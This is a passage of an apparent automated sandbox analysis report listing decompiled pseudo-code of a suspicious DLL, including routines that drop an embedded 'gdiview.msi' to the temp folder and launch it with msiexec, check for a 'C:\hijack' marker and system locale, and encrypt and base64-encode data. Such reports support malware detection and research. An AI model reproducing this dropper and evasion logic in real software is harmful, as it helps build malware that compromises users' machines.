                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseControlCreateDeviceFileHandle_memsetwsprintf
                                                                                                                                                                  • String ID: DISK$SCSI$\\.\Scsi%d:$z
                                                                                                                                                                  • API String ID: 3873020565-153650326
                                                                                                                                                                  • Opcode ID: 90ef5bbd0890bfc1898be704e586c13b7574c8df0df48dfabe30e792a59f74e8
                                                                                                                                                                  • Instruction ID: 864252d3b8c7652c0464aea4c6b0448db3b04a664ea9bb53ad0bcbd264417217
                                                                                                                                                                  • Opcode Fuzzy Hash: 90ef5bbd0890bfc1898be704e586c13b7574c8df0df48dfabe30e792a59f74e8
                                                                                                                                                                  • Instruction Fuzzy Hash: 30614AB4D04259DBDB20EF94CC94BAEBBB0FB44308F1081D9D548AB280DB759AC4CF85
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001A4E0, Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 107COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 92%
                                                                                                                                                                  			E1001A4E0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, char* _a4) {
				signed int _v8;
				char _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				void* __ebp;
				void* _t36;
				void* _t75;
				void* _t80;
				void* _t81;

				_t74 = __esi;
				_t73 = __edi;
				_t57 = __ebx;
				_v8 = 0;
				_v176 = L1000CEAF(__ebx, __edx, __edi, __esi, 0x10);
				_v168 = L1000CEAF(__ebx, __edx, __edi, __esi, 0x21);
				E1000CF80(__edi, _v168, 0, 0x21);
				E1000CF80(_t73, _v176, 0, 0x10);
				_t67 = _a4;
				_t36 = E1000CAD0(_a4);
				_t80 = _t75 + 0x24;
				if(_t36 <= 0) {
					E1000E2E0(_v168, "00000000000000000000000000000000");
					_t81 = _t80 + 8;
				} else {
					E1001BC70( &_v164);
					E1001CB20( &_v164, _a4, E1000CAD0(_a4));
					_t67 =  &_v164;
					E1001CC20( &_v164, _v176);
					_t81 = _t80 + 0x1c;
					_v8 = 0;
					while(_v8 < 0x10) {
						_t67 = _v168 + _v8 * 2;
						E1000CCA3(_t73, _v168 + _v8 * 2, "%02X",  *(_v176 + _v8) & 0xff);
						_t81 = _t81 + 0xc;
						_v8 = _v8 + 1;
					}
				}
				_push(_v176);
				E1000CA40(_t57, _t73, _t74, __eflags);
				_v172 = L1000CEAF(_t57, _t67, _t73, _t74, 0x11);
				E1000CF80(_t73, _v172, 0, 0x11);
				__eflags = _v168 + 8;
				E1000D1F0(_t57, _t73, _t74, _v172, _v168 + 8, 0x10);
				_push(_v168);
				E1000CA40(_t57, _t73, _t74, __eflags);
				return _v172;
			}













                                                                                                                                                                  0x1001a4e0
                                                                                                                                                                  0x1001a4e0
                                                                                                                                                                  0x1001a4e0
                                                                                                                                                                  0x1001a4e9
                                                                                                                                                                  0x1001a4fa
                                                                                                                                                                  0x1001a50a
                                                                                                                                                                  0x1001a51b
                                                                                                                                                                  0x1001a52e
                                                                                                                                                                  0x1001a536
                                                                                                                                                                  0x1001a53a
                                                                                                                                                                  0x1001a53f
                                                                                                                                                                  0x1001a544
                                                                                                                                                                  0x1001a5e4
                                                                                                                                                                  0x1001a5e9
                                                                                                                                                                  0x1001a54a
                                                                                                                                                                  0x1001a551
                                                                                                                                                                  0x1001a571
                                                                                                                                                                  0x1001a580
                                                                                                                                                                  0x1001a587
                                                                                                                                                                  0x1001a58c
                                                                                                                                                                  0x1001a58f
                                                                                                                                                                  0x1001a5a1
                                                                                                                                                                  0x1001a5c8
                                                                                                                                                                  0x1001a5cc
                                                                                                                                                                  0x1001a5d1
                                                                                                                                                                  0x1001a59e
                                                                                                                                                                  0x1001a59e
                                                                                                                                                                  0x1001a5d6
                                                                                                                                                                  0x1001a5f2
                                                                                                                                                                  0x1001a5f3
                                                                                                                                                                  0x1001a605
                                                                                                                                                                  0x1001a616
                                                                                                                                                                  0x1001a626
                                                                                                                                                                  0x1001a631
                                                                                                                                                                  0x1001a63f
                                                                                                                                                                  0x1001a640
                                                                                                                                                                  0x1001a651

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_strlenund_memcpy$_sprintf_strcat
                                                                                                                                                                  • String ID: %02X$00000000000000000000000000000000
                                                                                                                                                                  • API String ID: 796335831-606320477
                                                                                                                                                                  • Opcode ID: 60a3efe95e7a99799e389f975f9b0388983824a41eb2a0a313478185e6d091f1
                                                                                                                                                                  • Instruction ID: 0e7775b8e07c3591b5db09e074d1c70b9db2800ece633bf375f61c4185d71463
                                                                                                                                                                  • Opcode Fuzzy Hash: 60a3efe95e7a99799e389f975f9b0388983824a41eb2a0a313478185e6d091f1
                                                                                                                                                                  • Instruction Fuzzy Hash: B23131B9E0031CAFEB10D760DC42F9E7775DB85304F0444A4F5496B246EA71AA949B93
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1001FCD0, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E1001FCD0(void* __edi, void* __eflags) {
				char _v1027;
				char _v1028;
				char _v1291;
				char _v1292;
				int _t21;

				_t29 = __edi;
				_v1292 = 0;
				E1000CF80(__edi,  &_v1291, 0, 0x103);
				_v1028 = 0;
				E1000CF80(_t29,  &_v1027, 0, 0x3ff);
				GetTempPathA(0x104,  &_v1292);
				E1000CDB3( &_v1292,  &_v1292, 0x104, "gdiview.msi");
				E1000CCA3(_t29,  &_v1028, "msiexec.exe /i \"%s\"",  &_v1292);
				E1001FC70( &_v1292, 0x10027948, 0x39e00);
				_t21 = PathFileExistsA( &_v1292);
				_t38 = _t21;
				if(_t21 != 0) {
					return E1001A230(_t38,  &_v1028);
				}
				return _t21;
			}








                                                                                                                                                                  0x1001fcd0
                                                                                                                                                                  0x1001fcd9
                                                                                                                                                                  0x1001fcee
                                                                                                                                                                  0x1001fcf6
                                                                                                                                                                  0x1001fd0b
                                                                                                                                                                  0x1001fd1f
                                                                                                                                                                  0x1001fd36
                                                                                                                                                                  0x1001fd51
                                                                                                                                                                  0x1001fd6a
                                                                                                                                                                  0x1001fd79
                                                                                                                                                                  0x1001fd7f
                                                                                                                                                                  0x1001fd81
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1001fd8f
                                                                                                                                                                  0x1001fd95

                                                                                                                                                                  APIs
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FCEE
                                                                                                                                                                  • _memset.LIBCMT ref: 1001FD0B
                                                                                                                                                                  • GetTempPathA.KERNEL32(00000104,00000000), ref: 1001FD1F
                                                                                                                                                                  • _strcat_s.LIBCMT ref: 1001FD36
                                                                                                                                                                  • _sprintf.LIBCMT ref: 1001FD51
                                                                                                                                                                    • Part of subcall function 1001FC70: CreateFileA.KERNEL32(10027948,40000000,00000000,00000000,00000002,00000080,00000000), ref: 1001FC93
                                                                                                                                                                    • Part of subcall function 1001FC70: WriteFile.KERNEL32(00039E00,00000000,00000000,10027948,00000000), ref: 1001FCAE
                                                                                                                                                                    • Part of subcall function 1001FC70: CloseHandle.KERNEL32(00039E00), ref: 1001FCC3
                                                                                                                                                                  • PathFileExistsA.SHLWAPI(00000000), ref: 1001FD79
                                                                                                                                                                    • Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A245
                                                                                                                                                                    • Part of subcall function 1001A230: _memset.LIBCMT ref: 1001A269
                                                                                                                                                                    • Part of subcall function 1001A230: CreateProcessA.KERNEL32 ref: 1001A28B
                                                                                                                                                                    • Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A299
                                                                                                                                                                    • Part of subcall function 1001A230: CloseHandle.KERNEL32(?), ref: 1001A2A3
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$CloseFileHandle$CreatePath$ExistsProcessTempWrite_sprintf_strcat_s
                                                                                                                                                                  • String ID: gdiview.msi$msiexec.exe /i "%s"
                                                                                                                                                                  • API String ID: 1459467440-729886463
                                                                                                                                                                  • Opcode ID: 638d147b60cdaad351f02d20a3a99ddd6a7d58331e397eb4a17339b0ef9d2ce5
                                                                                                                                                                  • Instruction ID: 3bad07f9b44ae76435dc987b8054c1e75e99d3347c25e4cce5c64bbb1e3e6184
                                                                                                                                                                  • Opcode Fuzzy Hash: 638d147b60cdaad351f02d20a3a99ddd6a7d58331e397eb4a17339b0ef9d2ce5
                                                                                                                                                                  • Instruction Fuzzy Hash: 651170B9D0021866E710D7A0AC46FEE73389B14705F4404E4EB48A5181EFB5A7C88F91
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 100206B5, Relevance: 14.0, APIs: 1, Strings: 7, Instructions: 41COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 89%
                                                                                                                                                                  			E100206B5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t31;
				void* _t35;
				void* _t47;
				void* _t49;
				intOrPtr _t51;
				void* _t52;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t57;

				_t62 = __eflags;
				_t45 = __esi;
				_t44 = __edi;
				_t36 = __ebx;
				E1001FE40();
				E10020020(__ebx, __edi, __esi, __eflags, "install", "user01", "-0.1", "51.0", "exe");
				_t51 = _t49 + 0x14 - 0x1c;
				_t37 = _t51;
				 *((intOrPtr*)(_t47 - 0x248)) = _t51;
				 *((intOrPtr*)(_t47 - 0x260)) = E10001160(_t51, __eflags, "status=main_start");
				E100202C0(__ebx, __edi, __esi, _t62);
				_t52 = _t51 + 0x1c;
				if(PathFileExistsA("C:\\hijack") != 0) {
					L7:
					_t53 = _t52 - 0x1c;
					 *((intOrPtr*)(_t47 - 0x24c)) = _t53;
					 *((intOrPtr*)(_t47 - 0x264)) = E10001160(_t53, __eflags, "status=check_debug");
					E100202C0(_t36, _t44, _t45, __eflags);
					_t55 = _t53 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x250)) = _t55;
					 *((intOrPtr*)(_t47 - 0x268)) = E10001160(_t55, __eflags, "user01");
					E1001FF30(_t36, _t44, _t45, __eflags);
					_t57 = _t55 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x254)) = _t57;
					 *((intOrPtr*)(_t47 - 0x26c)) = E10001160(_t57, __eflags, "user01");
					E1001FE50(_t36, _t44, _t45, __eflags);
					_t59 = _t57 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x258)) = _t57 + 0x1c - 0x1c;
					 *((intOrPtr*)(_t47 - 0x270)) = E10001160(_t59, __eflags, "status=main_over");
					E100202C0(_t36, _t44, _t45, __eflags);
				} else {
					E1001A100();
					if(E1001A110(_t37) == 0 || E10019D70() != 0) {
					} else {
						_t35 = E1001FA90(_t36, _t44, _t45, __eflags, 0x3e8, 0);
						_t52 = _t52 + 8;
						__eflags = _t35;
						if(__eflags != 0) {
							goto L7;
						} else {
						}
					}
				}
				E1001A2C0();
				 *((intOrPtr*)(_t47 - 0x25c)) = 1;
				 *((intOrPtr*)(_t47 - 4)) = 0xffffffff;
				E100011A0(_t47 - 0x28);
				_t31 =  *((intOrPtr*)(_t47 - 0x25c));
				 *[fs:0x0] =  *((intOrPtr*)(_t47 - 0xc));
				return _t31;
			}












                                                                                                                                                                  0x100206b5
                                                                                                                                                                  0x100206b5
                                                                                                                                                                  0x100206b5
                                                                                                                                                                  0x100206b5
                                                                                                                                                                  0x10020784
                                                                                                                                                                  0x100207a2
                                                                                                                                                                  0x100207aa
                                                                                                                                                                  0x100207ad
                                                                                                                                                                  0x100207af
                                                                                                                                                                  0x100207bf
                                                                                                                                                                  0x100207c5
                                                                                                                                                                  0x100207ca
                                                                                                                                                                  0x100207da
                                                                                                                                                                  0x10020810
                                                                                                                                                                  0x10020810
                                                                                                                                                                  0x10020815
                                                                                                                                                                  0x10020825
                                                                                                                                                                  0x1002082b
                                                                                                                                                                  0x10020833
                                                                                                                                                                  0x10020838
                                                                                                                                                                  0x10020848
                                                                                                                                                                  0x1002084e
                                                                                                                                                                  0x10020856
                                                                                                                                                                  0x1002085b
                                                                                                                                                                  0x1002086b
                                                                                                                                                                  0x10020871
                                                                                                                                                                  0x10020879
                                                                                                                                                                  0x1002087e
                                                                                                                                                                  0x1002088e
                                                                                                                                                                  0x10020894
                                                                                                                                                                  0x100207dc
                                                                                                                                                                  0x100207dc
                                                                                                                                                                  0x100207e8
                                                                                                                                                                  0x100207f8
                                                                                                                                                                  0x100207ff
                                                                                                                                                                  0x10020804
                                                                                                                                                                  0x10020807
                                                                                                                                                                  0x10020809
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1002080b
                                                                                                                                                                  0x10020809
                                                                                                                                                                  0x100207e8
                                                                                                                                                                  0x1002089c
                                                                                                                                                                  0x100208a1
                                                                                                                                                                  0x100208ab
                                                                                                                                                                  0x100208b5
                                                                                                                                                                  0x100208ba
                                                                                                                                                                  0x100208c3
                                                                                                                                                                  0x100208ce

                                                                                                                                                                  APIs
                                                                                                                                                                  • PathFileExistsA.SHLWAPI(C:\hijack), ref: 100207D2
                                                                                                                                                                    • Part of subcall function 10019D70: GetSystemDefaultLCID.KERNEL32 ref: 10019D7D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DefaultExistsFilePathSystem
                                                                                                                                                                  • String ID: -0.1$51.0$C:\hijack$exe$install$status=main_start$user01
                                                                                                                                                                  • API String ID: 482051434-2164037247
                                                                                                                                                                  • Opcode ID: 73aec12ebb7ad2b35c583a1e9a4c5317c2f3ee5c586dd5546575d5ecf4528954
                                                                                                                                                                  • Instruction ID: 9599716a8016536e2dc487c9b8d22fe1c18f1641b674e0e16c19d2f9c65c59e9
                                                                                                                                                                  • Opcode Fuzzy Hash: 73aec12ebb7ad2b35c583a1e9a4c5317c2f3ee5c586dd5546575d5ecf4528954
                                                                                                                                                                  • Instruction Fuzzy Hash: B2018138D04309AED710EBA5AC4A6DD77A3EF51294F9401A9FA0467643EF31A5809AA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 1002199A, Relevance: 13.6, APIs: 9, Instructions: 123COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 87%
                                                                                                                                                                  			E1002199A(void* __ebx, void* __edx, void* __edi) {
				void* _t60;
				void* _t80;
				void* _t101;
				void* _t154;
				void* _t156;
				void* _t158;
				void* _t171;

				L0:
				while(1) {
					L0:
					_t150 = __edi;
					_t106 = __ebx;
					 *((intOrPtr*)(_t154 - 0xe2e0)) =  *((intOrPtr*)(_t154 - 0xe2e0)) + 1;
					_t60 = E10002270(_t154 - 0xe2a4);
					_t174 =  *((intOrPtr*)(_t154 - 0xe2e0)) - _t60;
					if( *((intOrPtr*)(_t154 - 0xe2e0)) >= _t60) {
						break;
					}
					L2:
					E1000CF80(__edi, _t154 - 0xab84, 0, 0x3710);
					E1000CF80(_t150, _t154 - 0x3d54, 0, 0x3710);
					_t80 = E10001A50(E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=");
					_t151 = _t80 - E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0))));
					E1000D1F0(__ebx, _t150, _t80 - E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t154 - 0xab84, E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), _t80 - E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))));
					E1000D903( *((intOrPtr*)(_t154 - 0xe2e0)), _t154 - 0x3d54, 0x3710, E10001A50(E100011E0(E100030B0(_t154 - 0xe2a4, _t174,  *((intOrPtr*)(_t154 - 0xe2e0)))), "=") + 1);
					E1000CF80(_t150, _t154 - 0xe294, 0, 0x3710);
					E1000CF80(_t150, _t154 - 0x746c, 0, 0x3710);
					E1000CCA3(_t150, _t154 - 0xe294,  *((intOrPtr*)(_t154 - 0x3d58)), _t154 - 0xab84);
					_push(_t154 - 0x3d54);
					_push(_t154 - 0xe294);
					_push( *((intOrPtr*)(_t154 + 8)));
					E1000CCA3(_t150, _t154 - 0x746c,  *((intOrPtr*)(_t154 - 0x7470)),  *((intOrPtr*)(_t154 - 0x18)));
					_t171 = _t156 + 0x7c;
					if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
						E1000D1F0(_t106, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x746c, E1000CAD0(_t154 - 0x746c));
						_t171 = _t171 + 0x10;
					}
					_t101 = E1000CAD0(_t154 - 0x746c);
					_t156 = _t171 + 4;
					 *((intOrPtr*)(_t154 - 0x14)) = _t101 +  *((intOrPtr*)(_t154 - 0x14));
				}
				L5:
				 *((char*)(_t154 - 4)) = 1;
				E100011A0(_t154 - 0xe2dc);
				 *((char*)(_t154 - 4)) = 0;
				E10003090(_t154 - 0xe2a4);
				 *((intOrPtr*)(_t154 - 4)) = 0xffffffff;
				E100011A0(_t154 - 0xe2c0);
				 *(_t154 - 0x10) = "\r\n%s%s%s\r\n";
				 *((char*)(_t154 - 0x21c)) = 0;
				E1000CF80(__edi, _t154 - 0x21b, 0, 0x1ff);
				_push( *((intOrPtr*)(_t154 - 0x18)));
				_push( *((intOrPtr*)(_t154 + 8)));
				E1000CCA3(_t150, _t154 - 0x21c,  *(_t154 - 0x10),  *((intOrPtr*)(_t154 - 0x18)));
				_t158 = _t156 + 0x20;
				if( *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) != 0) {
					E1000D1F0(__ebx, _t150, _t151,  *((intOrPtr*)( *((intOrPtr*)(_t154 + 0x28)))) +  *((intOrPtr*)(_t154 - 0x14)), _t154 - 0x21c, E1000CAD0(_t154 - 0x21c));
					_t158 = _t158 + 0x10;
				}
				 *((intOrPtr*)(_t154 - 0x14)) = E1000CAD0(_t154 - 0x21c) +  *((intOrPtr*)(_t154 - 0x14));
				 *[fs:0x0] =  *((intOrPtr*)(_t154 - 0xc));
				return  *((intOrPtr*)(_t154 - 0x14));
			}










                                                                                                                                                                  0x1002199a
                                                                                                                                                                  0x1002199a
                                                                                                                                                                  0x1002199a
                                                                                                                                                                  0x1002199a
                                                                                                                                                                  0x1002199a
                                                                                                                                                                  0x100219a3
                                                                                                                                                                  0x100219af
                                                                                                                                                                  0x100219b4
                                                                                                                                                                  0x100219ba
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x100219c0
                                                                                                                                                                  0x100219ce
                                                                                                                                                                  0x100219e4
                                                                                                                                                                  0x10021a0b
                                                                                                                                                                  0x10021a2e
                                                                                                                                                                  0x10021a52
                                                                                                                                                                  0x10021a91
                                                                                                                                                                  0x10021aa7
                                                                                                                                                                  0x10021abd
                                                                                                                                                                  0x10021ada
                                                                                                                                                                  0x10021ae8
                                                                                                                                                                  0x10021aef
                                                                                                                                                                  0x10021af3
                                                                                                                                                                  0x10021b06
                                                                                                                                                                  0x10021b0b
                                                                                                                                                                  0x10021b14
                                                                                                                                                                  0x10021b36
                                                                                                                                                                  0x10021b3b
                                                                                                                                                                  0x10021b3b
                                                                                                                                                                  0x10021b45
                                                                                                                                                                  0x10021b4a
                                                                                                                                                                  0x10021b50
                                                                                                                                                                  0x10021b50
                                                                                                                                                                  0x10021b58
                                                                                                                                                                  0x10021b58
                                                                                                                                                                  0x10021b62
                                                                                                                                                                  0x10021b67
                                                                                                                                                                  0x10021b71
                                                                                                                                                                  0x10021b76
                                                                                                                                                                  0x10021b83
                                                                                                                                                                  0x10021b88
                                                                                                                                                                  0x10021b8f
                                                                                                                                                                  0x10021ba4
                                                                                                                                                                  0x10021baf
                                                                                                                                                                  0x10021bb3
                                                                                                                                                                  0x10021bc3
                                                                                                                                                                  0x10021bc8
                                                                                                                                                                  0x10021bd1
                                                                                                                                                                  0x10021bf3
                                                                                                                                                                  0x10021bf8
                                                                                                                                                                  0x10021bf8
                                                                                                                                                                  0x10021c0d
                                                                                                                                                                  0x10021c16
                                                                                                                                                                  0x10021c21

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_strlen$_sprintf$__output_l_strcpy_s
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3854912713-0
                                                                                                                                                                  • Opcode ID: ce6b15c3fcdaa56ceb52cb1d185c127a632914fc5c4c1566f2125b128dce72e4
                                                                                                                                                                  • Instruction ID: 1147c12dce7df64e2ed4ffc9360bb1615f7fbc1f7e9a2ddb3abdd0b7a3fb9a22
                                                                                                                                                                  • Opcode Fuzzy Hash: ce6b15c3fcdaa56ceb52cb1d185c127a632914fc5c4c1566f2125b128dce72e4
                                                                                                                                                                  • Instruction Fuzzy Hash: 6B41A6B6D001186BDB14D7A0DC92EEE737DEF04240F0448A5F50DB6246EB757B488BA2
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 10022530, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                                                  			E10022530(void* __ebx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v36;
				char _v292;
				signed int _v296;
				char _v300;
				intOrPtr _v304;
				char _v308;
				intOrPtr _v312;
				void* __ebp;
				char _t61;
				char _t62;
				signed int _t70;
				intOrPtr _t102;
				intOrPtr _t103;
				char _t115;
				char _t116;
				signed int _t118;

				_t132 = __esi;
				_t131 = __edi;
				_t101 = __ebx;
				_t61 = "rundll32"; // 0x646e7572
				_v24 = _t61;
				_t102 =  *0x100264e4; // 0x32336c6c
				_v20 = _t102;
				_t115 =  *0x100264e8; // 0x0
				_v16 = _t115;
				_t62 = "explorer"; // 0x6c707865
				_v308 = _t62;
				_t103 =  *0x100264f0; // 0x7265726f
				_v304 = _t103;
				_t116 =  *0x100264f4; // 0x0
				_v300 = _t116;
				E1000CF80(__edi,  &_v292, 0, 0x108);
				E1001F1B0( &_v24,  &_v292,  &_v24);
				E1000D1F0(__ebx, _t131, __esi,  &_v36,  &_v308, 8);
				_t118 = _a4;
				_v12 = E1000CAD0(_t118);
				_v296 = 0;
				_t70 = _v12 & 0x80000007;
				if(_t70 < 0) {
					_t70 = (_t70 - 0x00000001 | 0xfffffff8) + 1;
				}
				if(_t70 == 0) {
					_t120 = _v12 + 8;
					__eflags = _t120;
					_v296 = _t120;
				} else {
					asm("cdq");
					_t120 = _t118 & 0x00000007;
					_v296 = 8 + (_v12 + (_t118 & 0x00000007) >> 3) * 8;
				}
				_v8 = L1000CEAF(_t101, _t120, _t131, _t132, _v296);
				E1000CF80(_t131, _v8, 0, _v296);
				E1000D1F0(_t101, _t131, _t132, _v8, _a4, E1000CAD0(_a4));
				E1001F110(_t101, _v8, _t131, _t132,  &_v292, _v8, _v8, _v296);
				asm("cdq");
				_v312 = L1000CEAF(_t101, 1 + (_v296 + 2) / 3 * 4, _t131, _t132, 1 + (_v296 + 2) / 3 * 4);
				asm("cdq");
				E1000CF80(_t131, _v312, 0, 1 + (_v296 + 2) / 3 * 4);
				_t90 = _v296 + 2;
				asm("cdq");
				E1001F2A0(_v312, 1 + (_v296 + 2) / 3 * 4, _v8, _v296);
				_push(_v8);
				E1000CA40(_t101, _t131, _t132, _t90 % 3);
				return _v312;
			}
























                                                                                                                                                                  0x10022530
                                                                                                                                                                  0x10022530
                                                                                                                                                                  0x10022530
                                                                                                                                                                  0x10022539
                                                                                                                                                                  0x1002253e
                                                                                                                                                                  0x10022541
                                                                                                                                                                  0x10022547
                                                                                                                                                                  0x1002254a
                                                                                                                                                                  0x10022550
                                                                                                                                                                  0x10022553
                                                                                                                                                                  0x10022558
                                                                                                                                                                  0x1002255e
                                                                                                                                                                  0x10022564
                                                                                                                                                                  0x1002256a
                                                                                                                                                                  0x10022570
                                                                                                                                                                  0x10022584
                                                                                                                                                                  0x10022597
                                                                                                                                                                  0x100225ac
                                                                                                                                                                  0x100225b4
                                                                                                                                                                  0x100225c0
                                                                                                                                                                  0x100225c3
                                                                                                                                                                  0x100225d0
                                                                                                                                                                  0x100225d5
                                                                                                                                                                  0x100225db
                                                                                                                                                                  0x100225db
                                                                                                                                                                  0x100225de
                                                                                                                                                                  0x100225fe
                                                                                                                                                                  0x100225fe
                                                                                                                                                                  0x10022601
                                                                                                                                                                  0x100225e0
                                                                                                                                                                  0x100225e3
                                                                                                                                                                  0x100225e4
                                                                                                                                                                  0x100225f3
                                                                                                                                                                  0x100225f3
                                                                                                                                                                  0x10022616
                                                                                                                                                                  0x10022626
                                                                                                                                                                  0x10022643
                                                                                                                                                                  0x10022661
                                                                                                                                                                  0x10022672
                                                                                                                                                                  0x1002268a
                                                                                                                                                                  0x10022699
                                                                                                                                                                  0x100226b2
                                                                                                                                                                  0x100226cb
                                                                                                                                                                  0x100226ce
                                                                                                                                                                  0x100226e5
                                                                                                                                                                  0x100226f0
                                                                                                                                                                  0x100226f1
                                                                                                                                                                  0x10022702

                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000002.00000002.312540255.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000002.00000002.312518457.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.312572333.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314418258.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314445212.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000002.00000002.314488445.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset$_strlen
                                                                                                                                                                  • String ID: explorer$rundll32
                                                                                                                                                                  • API String ID: 1975251954-2912785976
                                                                                                                                                                  • Opcode ID: 47feec5f4e07d9a8727310987636f621792a510bfb959471694aa5da43594d6a
